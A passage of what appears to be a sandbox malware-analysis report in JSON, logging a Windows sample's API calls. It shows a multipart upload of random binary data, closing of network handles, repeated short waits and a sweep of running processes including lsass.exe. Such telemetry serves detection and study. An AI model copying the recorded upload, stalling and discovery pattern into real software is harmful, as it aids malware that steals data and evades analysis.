name=\"HcCMDUdxbG\"; filename=\"SxGWcXSPLBAEOjYNpC\"\r\nContent-Type: application/octet-stream\r\n\r\n\\xca_\\x1bL\n\\xbd\\x8a\\xee\\x9eb\\x92\\xcbz\\xcf]\\xc2bn}\\xc7\\x15v\\xf4D\\x9f\\xe1>\\xe2\\x80\\x06\\xb1\\x9c\\x80\\x7fX\r\\xad\\x1fL\\xa9@q\\xb0\\xac1\\xf4)\\x08\\xbcS\\x0b\\xb5[#WA\\xcdP?;J\\xaa\\x17\\x06\\xfaE\\xf2\\x7f\\xcd\\xfc?\\xd8\\xcbo\\x066rN\\xd8Cv\\x05\\x86\\xf4" + } + ], + "repeated": 0, + "id": 1498 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 1499 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 1500 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 1501 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 1502 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1503 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "202" + } + ], + "repeated": 0, + "id": 1504 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "8196", + "caller": "0x7334bcc4", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1505 + }, + { + "timestamp": "2025-03-07 22:34:13,110", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "191" + } + ], + "repeated": 0, + "id": 1506 + }, + { + "timestamp": "2025-03-07 22:34:13,313", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1507 + }, + { + "timestamp": "2025-03-07 22:34:13,313", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "234" + } + ], + "repeated": 0, + "id": 1508 + }, + { + "timestamp": "2025-03-07 22:34:13,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1509 + }, + { + "timestamp": "2025-03-07 22:34:13,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "308" + } + ], + "repeated": 0, + "id": 1510 + }, + { + "timestamp": "2025-03-07 22:34:13,922", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1511 + }, + { + "timestamp": "2025-03-07 22:34:13,922", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "203" + } + ], + "repeated": 0, + "id": 1512 + }, + { + "timestamp": "2025-03-07 22:34:14,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1513 + }, + { + "timestamp": "2025-03-07 22:34:14,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "262" + } + ], + "repeated": 0, + "id": 1514 + }, + { + "timestamp": "2025-03-07 22:34:14,407", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1515 + }, + { + "timestamp": "2025-03-07 22:34:14,407", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "208" + } + ], + "repeated": 0, + "id": 1516 + }, + { + "timestamp": "2025-03-07 22:34:14,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1517 + }, + { + "timestamp": "2025-03-07 22:34:14,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "266" + } + ], + "repeated": 0, + "id": 1518 + }, + { + "timestamp": "2025-03-07 22:34:15,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1519 + }, + { + "timestamp": "2025-03-07 22:34:15,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "177" + } + ], + "repeated": 0, + "id": 1520 + }, + { + "timestamp": "2025-03-07 22:34:15,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1521 + }, + { + "timestamp": "2025-03-07 22:34:15,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "251" + } + ], + "repeated": 0, + "id": 1522 + }, + { + "timestamp": "2025-03-07 22:34:15,532", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1523 + }, + { + "timestamp": "2025-03-07 22:34:15,532", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "213" + } + ], + "repeated": 0, + "id": 1524 + }, + { + "timestamp": "2025-03-07 22:34:15,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1525 + }, + { + "timestamp": "2025-03-07 22:34:15,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "303" + } + ], + "repeated": 0, + "id": 1526 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x000004dc", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1527 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1528 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 1529 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 1530 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 1531 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 1532 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 1533 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 1534 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 1535 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 1536 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 1537 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 1538 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 1539 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 1540 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 1541 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 1542 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 1543 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 1544 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 1545 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 1546 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 1547 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 1548 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 1549 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 1550 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 1551 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 1552 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 1553 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 1554 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 1555 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 1556 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 1557 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 1558 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 1559 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 1560 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 1561 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 1562 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 1563 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 1564 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 1565 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 1566 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 1567 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 1568 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 1569 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 1570 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 1571 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 1572 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 1573 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 1574 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 1575 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 1576 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 1577 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 1578 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 1579 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 1580 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": 